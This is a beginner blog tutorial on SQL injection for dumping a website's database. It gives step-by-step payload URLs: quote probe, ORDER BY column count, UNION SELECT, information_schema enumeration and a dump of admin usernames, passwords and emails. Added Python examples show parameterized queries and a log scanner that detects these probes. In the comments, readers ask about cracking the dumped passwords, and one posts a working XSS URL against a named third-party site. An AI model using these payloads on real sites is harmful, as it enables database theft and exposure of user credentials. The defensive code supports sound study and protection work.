SQLi (SQL injection) is a hacking technique for dumping a website's database.
It is an old trick, yet far too many websites are still vulnerable to SQLi.
TUTORIAL FOR BEGINNERS
How to find SQLi vulnerability [Google Dorks]: http://pastebin.com/XKttipka
Finding the vulnerability:
Suppose we have a page with the URL http://www.ajithkp560.com/index.php?id=10
Now add a single quote ( ' ) at the end of the URL, i.e. http://www.ajithkp560.com/index.php?id=10'
If you get an error message, the website is vulnerable to SQLi.
Finding the total number of columns
Find the column count with "order by":
http://www.ajithkp560.com/index.php?id=10+order+by+1-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+2-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+3-- --> No error
...
http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error
The error at "order by 10" tells us the query has 9 columns.
Finding the vulnerable column
The vulnerable column can be found with union+select+1,2,3,...,TotalNumberOfColumns--
i.e. http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
** id=-10 is used to find the vulnerable column.
The SQL server version can be shown with http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--
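The quote probe, the "order by" count and the "union select" above all work for the same reason: the id parameter is pasted straight into the SQL text. The following is an added example (not code from this post or from the ajithkp560.com site) that models the mistake with a constructed in-memory SQLite table: lookup_vulnerable builds the query by string concatenation and reacts to the tutorial's inputs exactly as described, while lookup_parameterized validates the id as an integer and binds it as a placeholder, so none of the probes change the statement that runs. The table name, rows and function names are assumptions made for the example.

```python
"""Vulnerable vs. parameterized lookup for an `id` request parameter.

Added example, not the original post's code. It uses an in-memory SQLite
database with a constructed `news` table; the site in the post runs PHP on
MySQL, so this models only the query-building mistake, not that site.
"""
import sqlite3


def make_db():
    # Constructed sample data: an in-memory table standing in for the site's content.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(10, "Welcome", "first post"), (11, "Update", "second post")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, raw_id):
    """String concatenation: the request parameter becomes part of the SQL text.

    A trailing quote breaks the statement (the error message the tutorial looks
    for), ORDER BY past the column count errors, and a UNION SELECT appended to
    the value is executed as SQL.
    """
    sql = "SELECT title, body FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Placeholder binding: the parameter is sent as a value, never as SQL text.

    The value is validated as an integer first; anything else is rejected
    before it reaches the database, so neither the quote probe nor a UNION
    payload can alter the statement, and no database error text is produced.
    """
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # reject the request instead of leaking a database error
    return conn.execute("SELECT title, body FROM news WHERE id=?", (id_value,)).fetchall()


def probe(conn, raw_id):
    """Run one input through both lookups and report what happened.

    Returns a dict with 'vulnerable' and 'parameterized' entries: the rows
    returned, the string 'error' if the database raised an error, or None if
    the input was rejected by validation.
    """
    result = {}
    try:
        result["vulnerable"] = lookup_vulnerable(conn, raw_id)
    except sqlite3.Error:
        result["vulnerable"] = "error"
    result["parameterized"] = lookup_parameterized(conn, raw_id)
    return result


if __name__ == "__main__":
    db = make_db()
    # The tutorial's probes in order: a normal id, the quote test, an ORDER BY
    # count inside and outside the column range, and a UNION SELECT.
    for value in ["10", "10'", "10 order by 2--", "10 order by 3--", "-10 union select 1,2--"]:
        print(repr(value), probe(db, value))
```

The point to take from the output is the right-hand side: the parameterized lookup returns the same row for a legitimate id and simply returns None for every probe, which is why the "add a quote and look for an error" test finds nothing against it.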
After finding the vulnerable column, the next step is to list all the tables in the DB (database).
The tables can be listed with the query below:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--
Next, get the columns of a table. The table name has to be encoded as hexadecimal.
Here the table usuarios_adm is encoded as hexadecimal.
An online tool for this: http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm = 7573756172696f735f61646d
Now the URL becomes http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--
** 0xHexValue --> the 0x prefix tells the database that the value is a hexadecimal literal.
Dumping data from the columns
Dump the data from the columns with:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--
The data here was dumped with:
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
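Every step of the walkthrough above leaves a distinctive request in the web server's access log: a quote probe, an "order by N" sequence, "union select", a read of information_schema, "@@version" and 0x hex literals. The following added example (not part of the original post) is a small log scanner that decodes each request's query string and reports which of those patterns it matches. The log lines are constructed to resemble the tutorial's URLs, the IP addresses are documentation ranges, and the rule names are assumptions made for the example.

```python
"""Flag SQL-injection probes in web server access logs.

Added example, not the original post's code. It inspects the query string of
each request for the patterns the tutorial walks through and reports which
rules a request matched. Sample log lines are constructed for this example.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Each rule: (name, regex applied to the decoded, lower-cased query string).
RULES = [
    ("quote_probe", re.compile(r"=-?\d+'(?:&|$)")),          # id=10'
    ("order_by_count", re.compile(r"\border\s+by\s+\d+")),   # order by 1, 2, ...
    ("union_select", re.compile(r"\bunion\b.*\bselect\b")),  # union select 1,2,...
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("version_probe", re.compile(r"@@version")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b")),      # 0x7573... table names
]

# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_query(path):
    """Return the request's query string with URL and '+' encoding undone, lower-cased."""
    return unquote_plus(urlsplit(path).query).lower()


def classify(path):
    """Return the names of the rules matched by this request's query string."""
    decoded = decode_query(path)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines):
    """Parse access-log lines; return (ip, path, matched_rules) for flagged requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        matched = classify(m.group("path"))
        if matched:
            hits.append((m.group("ip"), m.group("path"), matched))
    return hits


# Constructed sample log lines modelled on the requests in the tutorial.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2015:13:55:36 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2015:13:55:40 +0000] "GET /index.php?id=10%27 HTTP/1.1" 500 612',
    '203.0.113.5 - - [10/Oct/2015:13:55:52 +0000] "GET /index.php?id=10+order+by+10-- HTTP/1.1" 500 612',
    '203.0.113.5 - - [10/Oct/2015:13:56:10 +0000] "GET /index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9-- HTTP/1.1" 200 5301',
    '203.0.113.5 - - [10/Oct/2015:13:56:30 +0000] "GET /index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d-- HTTP/1.1" 200 5402',
    '198.51.100.7 - - [10/Oct/2015:13:57:01 +0000] "GET /index.php?id=11 HTTP/1.1" 200 5098',
]


if __name__ == "__main__":
    for ip, path, rules in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(rules), path)
```

The scanner is signature-based, so it catches the literal form used in the tutorial and not every obfuscated variant; its value is in the sequence it exposes. One client producing quote_probe, then a run of order_by_count requests, then union_select with information_schema within a few minutes is the walkthrough above being replayed, and a 500 status on the early probes is the error message the tutorial tells readers to look for.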
11 comments
What are the random numbers, letters, and symbols that show up at the end? For example: 'rh4T7iQ#$'.
That is encrypted password...
How do you decrypt it? Are there programs?
Depends on their encryption...
So you have to guess as to what the encryption is?
I am working on Mafia Wars by Zynga in order to change data, how would one go about doing that
Nice post very helpful
dbakings: Even in 2016 this site is still vulnerable ...
Still vulnerable to XSS: http://www.outtakes.co.uk/search.php?search=%3Cscript%3Ealert%28%27AJITHKP560%27%29%3B%3C%2Fscript%3E
Thanks bro,,, thanks for your support and love... :)